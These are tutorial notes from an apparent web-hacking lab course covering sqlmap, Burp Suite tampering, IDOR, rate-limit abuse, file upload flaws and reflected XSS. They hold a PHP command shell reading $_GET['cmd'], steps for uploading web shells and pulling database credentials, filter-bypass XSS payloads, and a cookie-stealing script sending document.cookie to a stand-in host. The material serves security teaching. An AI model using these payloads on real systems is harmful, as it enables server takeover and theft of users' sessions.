Now right click & choose 'copy to file'. Choose any name and save it as a .txt file (eg: xyz.txt) in the SQLMap folder (i.e. the folder where SQLMap is installed).

Now go to SQL map, & type

Sqlmap -r “xyz.txt”

Press enter & SQLMap will start testing the request for SQL injection.

We saved the request to a txt file & used the request file switch (-r) to pass that file. SQLMap automatically parses the request & checks for SQL injection. And we don't have to worry about any cookies or authentication, because all the cookies are present in the request by default.

Output: SQLMap tells us that the parameter 'sign' is vulnerable to error-based & union-based SQL injections. Now, we can use the same switches as before to extract data: sqlmap -r "xyz.txt" --dbs

& so on.

Understanding Web Application Filters.

Examples of web application filters:

  1. Please enter a valid email ID: if the entered field doesn’t have @ in it.

  2. Entering letters in a phone number field gives an error or (enter valid phone number)

  3. Required img format: if we need to upload .jpg then uploading .png will throw an error.

  4. If only 10 characters are allowed, and we try to enter more, it will throw an error.

  5. You have to click on the I agree to the terms box, before proceeding.

  6. You cannot edit non-editable fields like the price of a product.

These are examples of web application filters.

They are input or check fields which have some criteria based on which the input is either accepted or not accepted.

How are these filters implemented?

There are 2 ways: client side filters & server side filters.

Client side filters: Verifying the inputs on the client side.

There would be a code running on the browser that validates the input before sending it to the server. Code is written using client side language. e.g: HTML & javascript.

Server side filters: Verifying the input on the server side.

The input is passed on to the server side as it is & is validated by the server. Code is written using server side language.

On the server side, the input is sent directly to the server & the server checks whether it is valid or not. These checks happen out of our reach &, therefore, are not easy to bypass, as we don't even know the conditions of these filters.

On the client side, the input is validated before being sent to the server. These checks are therefore within our reach: our own browser is checking the data & we can tamper with it using Burp Suite.
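
As an illustration, a server side filter is just validation code that runs on the server before the input is used. The sketch below is a hypothetical PHP signup handler (not the lab's code); because these checks run on the server, tampering with the request in Burp Suite after the client side check has passed will still be caught. The steps that follow only work when such server side checks are missing.

<?php
// Hypothetical server side validation for a signup form.
$email = $_POST['email'] ?? '';
$terms = $_POST['terms'] ?? '';

// These checks run on the server, out of the attacker's reach.
if (!filter_var($email, FILTER_VALIDATE_EMAIL)) {
    die('Please enter a valid email ID');
}
if ($terms !== 'true') {
    die('You must agree to the terms before proceeding');
}

echo 'Registration successful';
?>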

Steps to bypass client side filters:

  1. Enter correct data in the input field.

  2. Let the client side validate this input.

  3. Intercept this data.

  4. Tamper or change the data.

  5. Now, send the changed input to the server side.

  6. If there are no server side filter checks, then the invalid input will be accepted.

Bypassing Client Side filters with Burp suite:

Let's say we have to sign up somewhere.

We know that we cannot proceed by entering invalid data and without agreeing to the terms and conditions as it will throw an error.

So we will enter the correct details, check the I agree box. Turn on intercept in burp suite & click enter. We will see that the request has been intercepted by the proxy (burp site).

At the end of the request, we will see:

email=randommail%40email.com & password=1234

Fname=Teeya & Lname=Ojha & terms=true

Here, %40 is the URL encoded form of @

And terms = true means that we checked the box.

Now we can tamper the data and we can also delete the terms parameter. (if unable to delete, then just leave it blank/ make it 0 or NULL/ false). Now forward the request. If there are no server side checks, registration will be successful.

→Such a vulnerability is called Improper or Missing Server Side Validation Vulnerability.

Another example:

Suppose we have a website selling headphones worth 3000, with a discount of 300. We will add the item to the cart and proceed to checkout and intercept the request.

Now, from burp suite, we will try changing the price of the headphones. From:

price = 3000 , discount = 300 and wallet balance = 500

To: price = 800 , discount = 300 and wallet balance = 500

Forward the request; there is a server side validation check on the product price, so it will throw an error.

Now, if we go back to the payment page and try changing the wallet balance to 2700. And if it again throws an error, this means that there is a server side check on wallet balance as well.

Now, if we go back to the payment page and try changing the discount from 300 to 2500 and then proceed. result: order placed! This means that there is no server side check on discount.

IDOR: Insecure Direct Object Reference

Suppose we only require a roll number and a name to view the result of an exam. Then we can also view our friend's result by entering his details (here, the friend's result is the object being referenced directly).

Example 1 (GET based): Suppose we can see phone bill of some user & at the end of the url, we have:

….URL….user_id=1438 (GET based request)

Now, we can tamper with this data.

let's try: user_id=1437 result: No user found.

let's try: user_id =1439 result: Phone bill of some other user.

This is an example of IDOR.

If user id were alphanumeric, it would have been difficult for us to guess.
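
A hypothetical sketch of why this happens: the endpoint below fetches a bill purely from the user_id parameter and never checks whether that ID belongs to the logged-in user. The file, table and column names are assumptions for illustration, not the lab's code.

<?php
session_start();

// Hypothetical vulnerable endpoint: /bill.php?user_id=1438
$db = new mysqli('localhost', 'lab_user', 'lab_password', 'billing'); // placeholder credentials

// IDOR: the query trusts the client-supplied ID and never compares it
// with $_SESSION['user_id'], so any existing ID returns someone's bill.
$id = (int) $_GET['user_id'];
$result = $db->query("SELECT month, amount FROM phone_bills WHERE user_id = $id");

while ($row = $result->fetch_assoc()) {
    echo $row['month'] . ': ' . $row['amount'] . "\n";
}
?>

The fix is to look up the record using the ID stored in the authenticated session rather than an ID supplied by the client.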

Example 2 (POST based): When we can see details of user (call history) but nothing is visible in the URL, we know that it is a POST based request.

If we go to the proxy tab in burp suite, we can see it is a POST based request & we will send this request to the repeater.

(response → render).

We can see the call history & under request, we can also see the phone no. of the user. (request → raw)

Here, we can change the phone no. & then view the call history of the phone no. we entered.

Therefore, web applications can contain IDOR vulnerabilities in POST based requests as well.

Exploiting rate limiting Flaws:

In example 1 of the last topic, we saw that user 1437 did not exist, i.e. user IDs are random & not in sequence. So, to find the IDs of all users, do we have to keep guessing all 4-digit numbers manually?

If we keep changing the ID for 10 or 20 users & the website doesn't block us, the website has a rate limiting flaw.

Rate limiting flaw: a flaw where the website does not limit the number of attempts you make on its server to extract some data.

  • To exploit this flaw, we will use the Intruder Module of burp suite.

select the request→ right click → send to Intruder → Intruder tab will glow orange.

This indicates that the request has been sent. In the Intruder tab (Intruder → Target) we see the fields have already been filled in (Host: hackingenv.internshala.com & Port: 80).

Under it, we will have a tab named positions.

Positions: This lists out all the possible points from where the request can be exploited.

We will clear the cookie header for now & focus on exploiting the user ID part. We will keep the attack type as Sniper (great for attacking one insertion point).

Now we will move to the next tab, Payload.

Payload: We define the payloads here. We will set the payload type to numbers (since our user ID is numeric). Then, we will define the range of numbers (1000-1500); the bigger the range, the more time Burp Suite takes to attack. Now, we will start the attack.

We will see a lot of new rows in the results. The 1st row, with the request number shown as zero, is our base request that we sent to the Intruder. The Payload column tells us the value that was inserted at the given position.

The Status column tells us the HTTP response status.

200: ok

404: not found

302: redirected

The Length column represents the length of the response; numbers are displayed under this column.

The base request has a response length of 38183 & the response length of most other requests is much lower (491). This means that all requests with such low response lengths probably correspond to invalid user IDs (i.e. no data exists against these IDs).

If a response length is close to that of the base request (larger than the response length for an incorrect ID request), it is a correct user ID.

We can sort the results in descending order of length by clicking on the Length column.

We can select any request & see its response using the render tab. (just like before) or by sending the request through the browser. (request tab → right click → request in browser → in original session → copy link → use in browser).

Just like IDOR, Rate limiting can also be a critical vulnerability. Here's how:

Suppose a website allows us to refer a friend for membership: all we need to do is enter an email ID & click on refer (the referred person will find a referral email in their inbox).

Now, we will turn on Intercept on burp suite & then send requests for referral. To check for rate limiting flaws, we will send the request to the intruder & clear all insertion points (cookies).

Now, in the Payloads tab, we will select 'Null payloads' as the payload type & specify the number of requests we want to send (in this case: 100).

  • Generate 100 payloads.

Hit enter and we will find 100 new referral emails in the inbox.

  • Imagine the load on the server if this was increased to a million requests.

  • Imagine the loss if the website is charged for every referral sent, or if a phone call is made for every request.

Therefore, Absence of proper rate limiting can be harmful.

Question: Read about other types of attacks in Intruder like Cluster Bomb, Pitch Fork, and Battering Ram.

Ans: Types of attacks in Intruder

Cluster Bomb - This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates through each payload set in turn, so that all permutations of payload combinations are tested. I.e., if there are two payload positions, the attack will place the first payload from payload set 2 into position 2, and iterate through all the payloads in payload set 1 in position 1; it will then place the second payload from payload set 2 into position 2, and iterate through all the payloads in payload set 1 in position 1. This attack type is useful where an attack requires different and unrelated or unknown input to be inserted in multiple places within the request (e.g. when guessing credentials, a username in one parameter, and a password in another parameter). The total number of requests generated in the attack is the product of the number of payloads in all defined payload sets - this may be extremely large.

Pitchfork- This uses multiple payload sets. There is a different payload set for each defined position (up to a maximum of 20). The attack iterates through all payload sets simultaneously, and places one payload into each defined position. In other words, the first request will place the first payload from payload set 1 into position 1 and the first payload from payload set 2 into position 2; the second request will place the second payload from payload set 1 into position 1 and the second payload from payload set 2 into position 2, etc. This attack type is useful where an attack requires different but related input to be inserted in multiple places within the request (e.g. a username in one parameter, and a known ID number corresponding to that username in another parameter). The total number of requests generated in the attack is the number of payloads in the smallest payload set.

Battering Ram - This uses a single set of payloads. In general, this attack is useful where an attack requires the same input to be inserted in multiple places in the request.

Example: Consider a page having two input fields, now to check for XSS, we require the Burp intruder to put each payload in the request where we are having multiple payload positions.

Question: Read about other payload types including Brute Forcer, Dates, Username Generator, Null Payloads, etc.

Payload Types

Bruteforcer: This payload type generates payloads of specified lengths that contain all permutations of a specified character set. The following options are available: Character set - The set of characters to be used in the payloads. Note that the total number of payloads increases exponentially with the size of this set. Min length - The length of the shortest payload. Max length - The length of the longest payload.

Dates: This payload type generates date payloads within a given range and in a specified format. This payload type may be useful during brute forcing (e.g. guessing the date of birth component of a user's credentials).

Username Generator: This payload type lets you configure a list of names or email addresses, and derives potential usernames from these using various common schemes.

NULL Payloads: This payload type generates payloads whose value is an empty string. This payload type is useful when an attack requires the same request to be made repeatedly, without any modification to the basic template.

  • Earlier, we discussed the concept of shared hosting. If websites A and B are hosted on the same server, we can use website A to gain access to the server and hence to website B (or any other website hosted on that server). To get into a server, we need to attack a website & then get into the server through it.

Ways to attack / Infect a web server

→ Uploading a malicious program / script on the server to gain complete access via a backdoor.

→ Injecting commands in the web Application software.

→ Finding & exploiting an existing backdoor.

→ Exploiting a software running on the server which has a known vulnerability.

→ Cracking the password of remote control services like FTP, Telnet, SSH, RDP etc.

→ Hacking another server connected to the server of interest & then exploiting them.

Understanding Basic File Upload Vulnerabilities

Suppose there is a website where we have to upload our resume in .pdf format. As soon as we upload, a download link appears against the uploaded file (i.e. we can download the file back).

Let's try uploading a .jpeg / .txt / .php file instead. (PHP is a server side programming language and can execute commands on a server.) Let's try uploading a PHP file & make the server do something: we will upload a sample PHP file with hello world code. (The 1st flaw is that, despite asking for a PDF, the web application is letting us upload files in other formats too.)

We will now try to download our PHP file. We know that a PHP file is always executed & not downloaded, so when we click on download, the code will get executed. This type of vulnerability is called an Arbitrary File Upload vulnerability.

We will now do penetration testing to see how much we can exploit. We will now upload a php file with the following code:

<?php
echo exec('whoami');
?>

exec: a PHP function used to execute Windows or Linux commands directly & return the response.

Whoami: command used to show the current user like the administrator/ guest/root etc.

We will now upload this file & run it (download it) & here we can see the kind of user we are. (let's say: nginx)

If we open the command prompt in our system & type whoami, we will get our username as the result. But here, since we are running the command through the server software, which in this case is nginx, hence we get the nginx user.

If we get root (on Linux) or nt authority\system / administrator (on Windows) as the output of the whoami command, it means we have complete administrative control of the server. There are numerous commands we can run on a server, but first we have to identify whether it is a Windows based or a Linux based server, since most commands are specific to only one of them. whoami got executed because it exists on both Windows & Linux servers. To identify what kind of server it is:

<?php
echo shell_exec($_GET['cmd']);
?>

Shell_exec: function, does the same work as exec function used above.

$_GET['cmd'] reads the value of the cmd parameter when it is passed, and since it is wrapped in shell_exec, whatever value is passed will get executed as a shell command. Since this is a GET based request, we can enter the value of cmd in the URL ourselves.

Now, we will upload & run this command. As we will see in the URL, we can now insert our command as a GET parameter.

Now, here we can use either of these commands (dir / ls) to identify the type of server. These commands let us see if the server is Windows or Linux based.

dir → Windows and ls → Linux.

Now, we will pass the ls command:

….URL….?cmd=ls

Result: We will get some files here:

Helloworld.php, whoami.php and resume.php

This implies the server is linux based.

But now, we don’t know all the commands of linux. So what do we do now?

The hacker community is well established, they have created php web shells.

PHP web shells: PHP scripts that allow us to interact with any type of server without knowing many Linux or Windows commands. Examples: B374K mini shell, B374K shell, C99 shell, C100 shell, 404 shell, R57 shell & uploader shell.

  • Uploading a shell on any website without consent is a severe crime. It comes under mass cyber attack as all websites on a server can be affected & exploited if some other hacker finds it.

  • Shells are basically backdoors, sometimes known as malware or trojans. Once installed/uploaded on a website, they can give a hacker complete access to the server of that website.

Uploading Shells

Where do we get access to a shell?

They are available on the internet & we can download them.

B374K: We will save the file as minishell.php, upload it on the target website & run it. Most shells are protected by a password by default; for this shell, the password is root.

This is basically a file browser through which we can get access to any file on the server.

However, it is possible that not all of these files can be accessed by us, since some of them may have restrictions.

To see what websites are running on this server:

For this, we will select www from the red path on top of the table, which will show us all the websites.

Now, if more than one website is hosted on a server, the hacker can get access to all of these. But, what if we want to access more critical files of all the server administrators. This can be done by navigating to the home folder, but we may have limited access to these folders.

This shell will also let us execute commands on the server. So we can type any linux command in the text field above the menu. (e.g. whoami | result: nginx)

By clicking on the information tab, we can get a lot of internal info about the server. By clicking on the process tab, we can even kill some processes that are running on the server (you can read more about this online). As we browse more, we might run into some configuration files present on the server (say: config.php). If we are lucky, such a file might contain the database hostname, username & password etc.

We can go to the connect tab & enter the database username & password here, and see what we can get.

We might get complete access to the database (in this case, the database of the hacking lab & all the files / tables in it.) (no need for sql injection anymore.)

We can click on any database names & see the tables inside them. We can even read the data inside these tables.

→ So this is how a simple file upload vulnerability can give complete access to the database of a website & all the websites hosted on that server & hacker can destroy them all.

But, uploading a php shell, even when we are asked to upload a php file is not gonna be possible for all the websites.

Example 2: Suppose a web site asks us to upload pdf files.

We will turn on intercept in Burp Suite, upload the file and forward the request. It will show an error for the Helloworld.php file (it might say: invalid file type), but it will accept a .pdf file. If we look at the requests for both of these, we will see a filename and a Content-Type header.

For php: Content-Type: application/octet-stream

For pdf: Content-type: application/pdf

This is where the 2 requests differ from each other & this is probably what is stopping us from uploading the PHP file. So, if we turn intercept on, upload the PHP file, intercept its request, change the Content-Type to application/pdf & forward the request, it will get uploaded. Now, if we try downloading it (i.e. running it), it will work. This is how we can trick the server, and we can again upload the shell here, like before.

  • Not all websites will allow us to change the content type header.

Example 3: Suppose a website wants us to upload .jpeg, .gif or .png file.

So if we upload a .php file type, it is invalid. Now, if we turn on the intercept on the burp suite, we will find that no request for the file is going to the server (i.e. file is being blocked on the client side itself). So, we can try saving the file name as 'Helloworld.jpeg’ Instead of Helloworld.php. By doing this, we will receive a request when we upload the file. Now, we can intercept this request and change the file name back to helloworld.php and then forward the request (since the .jpeg file was of no use to us).

If it still throws an error, then this means that we cannot upload a .php file, no matter what (i.e. we cannot infect the server). But we can try uploading some other file, with some other type of impact (say Html, since It is client side language). Then maybe we can deface the website or make the user do something that the website did not intend us to do.

We know that it won’t let us upload a .html file. So we will change the file name to .jpeg extension & then upload it & intercept the request (while uploading). Then we will change the extension in the file name back to html. The file will get uploaded and we will run it.

→ The attacker can upload phishing forms & ask the user for personal details (like credit card numbers), & since the user trusts the website, he might fall for the trick.

Understanding Response Headers

So, in the previous module, we looked at some server side attacks. These attacks are used to attack the server or to take complete control of the server. It is important to know server side languages like PHP and sql to carry out these attacks, or to prevent them.

However, in this module, we will look at the client side attacks. These attacks are used to cause harm to the users of a web application directly.

So, by carrying out these attacks, the hacker can directly attack the browser of the victim. To understand these attacks, we need to know client side languages like HTML and Javascript.

To understand client-side attacks, let us first understand how a web browser works.

We know that when we open a website, let’s say internshala, an HTTP request is sent to the server. The server then processes this request and sends back an HTTP response to our browser. Now, this HTTP response is parsed by our browser and displayed to us.

But, this HTTP response contains something called HTTP headers. These headers are the metadata that is not shown to us.

But, if we analyse these response headers, we can learn a lot about the way HTTP responses work.

Now usually the HTTP response headers are very lengthy, and we are not going to look at each and every line.

We will mainly look at 3 important HTTP response headers.

The first line of the header, tells us about the nature of the response.

The set-cookie header.

Content length header.

We will look at each one of these.

Let’s start with the first line of the response header.

So, this is a sample HTTP response captured by Burp Suite. If we look at the first line of this response, it says: HTTP/1.1 200 OK.

We have seen this response many times in the previous module. The 200 response means that everything is okay.

Now, this is just one type of response. There are a few more important responses that we must know about.

30X: A response in the 300 range is used to signify redirection. For example, if you requested for page 1, but are being redirected to page 2. In this case, the response will say, “301 Moved Permanently to Location: page2”.

40X: These responses depict errors that occur due to the user’s fault. The most common response we have all come across is 404:Not Found error. We get this response when the page we have requested for does not exist.

Another example is the 403: Forbidden response. This comes when you request for a page that you are not supposed to visit.

50X: These responses occur when there has been some error on the server side. For example, if a website is not able to connect to its database due to some server side code error, you might see 500 internal server errors.

So, these were some important responses sent in headers.

You must remember these ranges and their meaning well, since by looking at this we can get an idea of what kind of response the server wants to give us.

Now, after the first line of the response headers, we see some standard HTTP response headers. These headers basically tell the browser about the response and how to handle it. They are like the configuration settings sent by a web server to be stored in the browser for later usage.

In these settings, you may choose to study about some of them in detail. These include the Content Security Policy, Referrer Policy, Allow Origin, X-powered-by, etc. We will not be covering these in our topic, but you can read more about them online.

HTTP response headers:

  1. First line of the response.

  2. Set cookie header.

  3. Content length header.

Understanding Sessions & Cookies

Let's say we go to McDonald's and order Meal 1 (aloo burger + fries + coke). The order is given to us, we eat and we leave. This whole process is called a session.

Now suppose, the next day, we order the same thing. They don't remember us, and don't know our preferences. This type of transaction is impersonal in nature.

To make this more personalised, let's say McDonald's gives us a card on which our preferences, card numbers etc. are saved (it's like an identification card with some digits on it). This card is like a cookie. So, the next time we visit, we show our card, they match the number on their server & now have our old orders, preferences & payment details etc., giving us a more personalised experience. Here:

Us → browser/client

Mcdonald → Server

ID card → cookie given by server

Cookies are stored in our browser, Just like the card is kept by us. When we visit a website, the browser takes the cookie to the server in the Http request. Then, the server reads this request, identifies us, & sends back an Http response. This makes our experience personalised on that website, based on our previous sessions or visit.

If someone gets hold of the cookie, they can impersonate us and get hold of our important data from the server (eg: McDonald's has our payment details, so they can place multiple orders in our name & money will automatically be deducted from our account).

Therefore, Cookies are crucial to hacking & their proper storage is important.

Suppose our cookie (ID card) is only valid for a month (say, till 1st Dec). So, when we visit on Dec 2nd, we don't have a cookie card. But we have an account on mcdonalds where all our preferences & customizations are stored on their server. To access this, we will need a password that we have. We give this password & they will create a new cookie card for us. Which again can be used for another month.

Now suppose we visit a website A, login to our account & it gives us a cookie. This cookie has an expiration time of 50 days. So once it expires, It automatically gets deleted from our browser. So, next time we visit after 50 days, we will have to login again, and it will give us a new cookie.

2 major uses of a cookie:

  1. A cookie is used to give us a personalised experience on a website.

  2. It is used to authenticate us at each action we take on a website. So that you do not have to put your credentials at each step of your journey on the website. This makes the browsing experience convenient for a user.

Sessions: Sessions start when we visit a website & they end when you leave a website.

Cookies:

  1. Cookies are a client side piece of information and are stored in our browser.

  2. They are used to give us a personalised experience.

  3. They are used to identify us as a user & authenticate us automatically at each step, so that we don't have to enter our password at each action we take.

  4. Every cookie has an expiration time.

  5. A cookie becomes invalid & gets deleted upon expiry.

Cookie token: A cookie token is a string of alphanumeric characters. It's 30-100 characters long & hence doesn't make the browser very heavy.

eg: Midasti12490wfwef3434dw323edwfwfw2325esijadr3

→ Suppose we open facebook & type username & password. The 1st HTTP request sent will look like this:

POST /login HTTP/1.1

Host:facebook.com

Username: sunflower@123.com

Password: yurionince7

Then facebook sends a cookie in its response.

PHPSESSID: iuehgwro73y483653874563478tgeruygfejrgf

Facebook also stores this cookie token in its server so as to identify us. So, next time we visit facebook, HTTP request sent from our browser looks like this:

GET / HTTP/1.1

Host:facebook.com

Cookie: PHPSESSID: iuehgwro73y483653874563478tgeruygfejrgf

The server sees this cookie, knows it's you, & you're logged in! We did not have to type the credentials again.

Set cookie header

Let's look at this response captured by burp suite.

as we can see, all cookies are in this format:

Set-Cookie: csrf-cookie-name = 7ac5599…..tyyfg3

Cookie:

Cookie 1 = value 1

Cookie 2 = value 2

Etc etc.

set-cookie: isc = c23b….985

We know that cookies exist in cookie value pairs. If we see the response, We find there is a session token cookie which is used to maintain a session b/w a client & a server.

sessiontoken = uytkyghff76564…….675; path =/

Content length header:

We know that the content-length header has some number as its value. The number indicates the length of the actual HTML response sent by the server, which appears below the headers. This is the actual response that is parsed by our browser & displayed visually to us. eg: Content-Length: 12394
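
For reference, this is roughly how a server sets such a cookie from PHP. The cookie name, token length and lifetime below are placeholders, not the values from the captured response.

<?php
// Generate a random session token and ask the browser to store it.
// setcookie() adds a Set-Cookie header to the HTTP response.
$token = bin2hex(random_bytes(32));   // 64-character token

// Expires in 50 days, valid for the whole site, not readable from JavaScript.
setcookie('sessiontoken', $token, time() + 60 * 60 * 24 * 50, '/', '', false, true);

// On later requests, the browser sends the cookie back automatically.
echo $_COOKIE['sessiontoken'] ?? 'no cookie stored yet';
?>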

Please learn how to integrate HTML, javascript, and PHP before moving further.

Also, please learn about DOM (document object model) and event listeners.

What is Cross Site Scripting or XSS?

→ Suppose we are browsing a website & while browsing, we see a pop-up showing a cool deal on a product. We open the pop-up, and We buy that product. As we enter our card details, we see multiple transactions from our card. How did this happen? In the URL, we see the name of our trusted website, followed by some characters. Doesn't look suspicious, but these special characters are actually the malicious script injected by the hacker.

To execute this malicious script, a hacker needs to inject them in the Html code of a web application, which is then executed by our browser.

What is temporary XSS?

The vulnerabilities which allow hackers to insert malicious codes into the Html code of the browser are called temporary cross site scripting or temporary XSS.

The reason this attack is called temporary is because the injection only happens when the user clicks on the hacker made link & is not stored in the Application.

Permanent XSS

There used to be a website named MySpace (just like Facebook). It was brought down by a hacker named Samy by exploiting an XSS vulnerability. He found that he was able to reflect special characters into the source code of the application by entering them in his status. He also realised that if he entered some custom HTML code in his status, the same HTML would be sent in the response to anyone who viewed his status, and would then be executed by their browsers. To test this, he injected a malicious script that automatically added anyone who viewed his status to his friend list. Due to the injected code, Samy saw the number of friends in his friend list increase exponentially, as the script replicated itself into the HTML served to all the users of MySpace, & soon he was able to control the look of MySpace for all its users. Just like a virus, the HTML code infected all the users of MySpace in a short time & eventually, MySpace had to be taken down.

Q. What is temporary XSS?

The vulnerabilities that allow hackers to insert malicious codes into the HTML code of the browser are called as temporary XSS or reflected xss. This attack is called temporary as the injected attack is not stored within the application, rather it infects only those users who have access to these links.

Q. What is permanent XSS?

The vulnerabilities that allow hackers to inject and execute malicious client side scripts through the browser which gets permanently stored in the server are called as permanent XSS or stored XSS.

Q. What is an HTML injection? When a hacker is not able to execute JavaScript using XSS, but still able to cause potential harm using HTML. This particular vulnerability is called HTML injection which occurs due to improper output validation as the website without any proper sanitation attaches the user input to its own HTML code.

Temporary XSS | Permanent XSS
--- | ---
Hacker injects & executes malicious client side scripts through the browser; the script is not stored in the application and only affects users who open the crafted link. | Hacker injects & executes malicious client side scripts through the browser; the script gets permanently stored on the server and affects every user who views the infected page.

How to exploit temporary XSS?

The websites that use user specific information to display customised results are most vulnerable to temporary XSS. eg:

Suppose we are at a page where we have to enter our name and it shows a customised response:

Hello Teeya

How are you?

Now, let's suppose we can see in the URL that we are directed to a page called hello.php and data is being sent as a get based parameter. Eg URL:

…../hello.php?user_name=Teeya

To check for XSS, let's try entering special characters in the URL and see if they are passed as such.

…../hello.php?user_name=Teeya’’<>@#

If, instead of throwing an error, it reflects the input as-is in the response, this means that whatever we enter in the URL is getting passed into the HTML response.

We can confirm this by viewing the source code of the page. (for mac: option+command+U and for windows: ctrl + U) under this, we can see our text getting passed inside the paragraph tag of the HTML.

<p> Hi Teeya’’<>@# </p>
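
The server side of such a page is usually something like the sketch below (an assumed hello.php, not the lab's actual source), where the GET parameter is echoed into the HTML without any encoding:

<?php
// Hypothetical hello.php - reflects user input straight into the page.
$name = $_GET['user_name'] ?? 'guest';

// No htmlspecialchars() here, so any tags inside user_name become real HTML.
echo '<p> Hi ' . $name . ' </p>';
?>

Passing the value through htmlspecialchars() before echoing it is what would normally prevent this reflection.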

This might give us a hint that we can inject custom HTML tags in the URL. Eg:

…../hello.php?user_name=<i>Teeya’’<>@#</i>

We will see Teeya change from normal to italics. We will also see <i> tag added in the source code. This confirms that we can inject our custom HTML tags through get parameters.

  • Many times it is possible that the special characters we entered in the URL may not be visible on the webpage. This does not mean that the website is not vulnerable to XSS. This can only be confirmed after viewing the source code.

Now, let's try to enter something, which hackers might use. Like creating a hyperlink of our own in the webpage.

…../hello.php?user_name= Teeya <br> <a href="http://hacker.com"> login to your account securely </a>

We will see that after inserting our own custom HTML tags in the URL, it has created a hyperlink in the response window of the webpage.

Such a hyperlink, when opened, may ask the user to enter confidential information, which the hacker can then steal; the user is likely to comply because they trust the website the link appeared on. The hacker can even add obscene or explicit photos or videos to the page, damaging the website's reputation. This is one of the ways in which temporary XSS can be exploited.

As we know, XSS can also be exploited using JavaScript. Before doing so, we first need a proof of concept (POC) showing that JavaScript can actually be executed on the page.

If we add the following in the URL:

…../hello.php?user_name= Teeya <br> <a href="http://hacker.com"> login to your account securely </a> <script>alert(1)</script>

We will see a pop-up window. This pop-up is our proof of concept: it is confirmation from the website that JavaScript can be executed on this page. And since we were able to inject and run a simple alert box, we can in principle run anything written in JavaScript, such as keyloggers, or scripts that steal user cookies or session tokens, and much more.
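To illustrate the cookie-stealing part, a hacker could inject a script that sends document.cookie to a server they control and collect it with a tiny endpoint like the one sketched below. The domain hacker.example, the file name steal.php, and the log file are all made-up names used only for this example.

```php
<?php
// steal.php -- hypothetical collector hosted on the attacker's own server
// (hacker.example is a placeholder domain used only in this sketch).
//
// The injected payload on the vulnerable page might look like:
//   <script>
//     new Image().src = 'http://hacker.example/steal.php?c='
//                       + encodeURIComponent(document.cookie);
//   </script>
//
// Every victim whose browser runs that payload silently requests this file,
// handing over their cookies in the ?c= query parameter.

if (isset($_GET['c'])) {
    $entry = date('c') . '  ' . $_SERVER['REMOTE_ADDR'] . '  ' . $_GET['c'] . "\n";
    file_put_contents(__DIR__ . '/cookies.log', $entry, FILE_APPEND);
}
```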

This is how temporary XSS is exploited using HTML and JavaScript when data is being sent as a GET parameter.

How to bypass protective filters and perform temporary XSS?

On some websites we may be unable to inject JavaScript because of protective filters, and to execute JavaScript we first need to bypass them. The first step is to figure out whether the data we are entering becomes part of the HTML response at all.

If we try entering a few special characters after the text in the URL:

…URL…'''<>

If the text gets printed as-is in the response, and we look at the HTML code, we can see all the characters in it. Now, let's try entering HTML tags and see the response.

…URL…<u>...</u>

If the text changes from normal to underlined, and a look at the page source shows our <u> tag in place, we were able to inject custom HTML code into the website.

This confirms the website is vulnerable to XSS.

Now, if we try to inject JavaScript,

…URL…<script>alert(1)</script>

It fails. This happens due to the protective filters.

Now, to bypass the protective filters, we need to see which part of the script is being blocked by the server. If we view the page source, we might find something like:

>alert(1)</script>

The <script part was removed from the code. So, to execute the script without triggering the protective filter, we need a way around it.

One way of doing this is by changing how we write <script in the URL.

…URL…<sCript>alert(1)</script>

This works because, while JavaScript itself is case-sensitive (so we leave alert(1) as it is), HTML tag names are not. The browser still treats <sCript> as a script tag, but the protective filter, which is looking for the exact lowercase string <script, no longer matches it. So by simply changing the case of the HTML tag, we bypass the filter.
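As an assumption about what such a filter might look like internally, the sketch below strips only the literal lowercase string <script from the input, which is exactly the kind of filter that a change of case defeats. The real filter on any given site is, of course, unknown.

```php
<?php
// Hypothetical naive protective filter: it removes only the literal
// lowercase string "<script", so changing the case of one letter defeats it.

function naive_filter($input) {
    // Case-SENSITIVE removal -- "<sCript" does not match and passes through.
    return str_replace('<script', '', $input);
}

$blocked  = naive_filter('<script>alert(1)</script>');  // becomes ">alert(1)</script>"
$bypassed = naive_filter('<sCript>alert(1)</script>');  // unchanged

// Echoing the filtered values without encoding (as the vulnerable page does):
// the first payload is broken, but the second is still parsed as a script tag
// by the browser (HTML tag names are case-insensitive) and the alert fires.
echo "<p>" . $blocked . "</p>";
echo "<p>" . $bypassed . "</p>";
```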

Now, this was one case where we could see which part of the code was removed in the page source. But we may also encounter cases where the <script> tag is blocked in any form, yet we can still execute JavaScript through other HTML. For example:

If no other HTML tags or attributes are being blocked, we can execute JavaScript by using inline event handler attributes instead of a <script> tag.

….<img src=x onerror=alert(1)>....

We know that the image "x" will not be found, so the browser fires the onerror handler, and hence we get our JavaScript alert box.
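If the filter is smarter and strips the <script> tag regardless of case, a sketch of the same idea shows why an inline event handler still gets through. Again, this filter is only an assumed example, not the actual code of any site.

```php
<?php
// Hypothetical stricter filter: removes the opening <script tag in ANY case,
// but leaves every other tag and attribute alone.

function stricter_filter($input) {
    // Case-insensitive removal of "<script".
    return preg_replace('/<script/i', '', $input);
}

$payload = '<img src=x onerror=alert(1)>';

// Nothing in the payload matches "<script", so it survives the filter intact.
// The browser fails to load the image "x", fires the onerror handler, and the
// alert executes even though <script> tags are being stripped.
echo "<p>" . stricter_filter($payload) . "</p>";
```

This is also why blacklist-style filters are generally considered weak: the robust defence is to encode output (for example with htmlspecialchars()) rather than to try to strip every dangerous string.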

This is how we can bypass protective filters and exploit temporary XSS, either by changing the case of the tag or by using inline event handlers.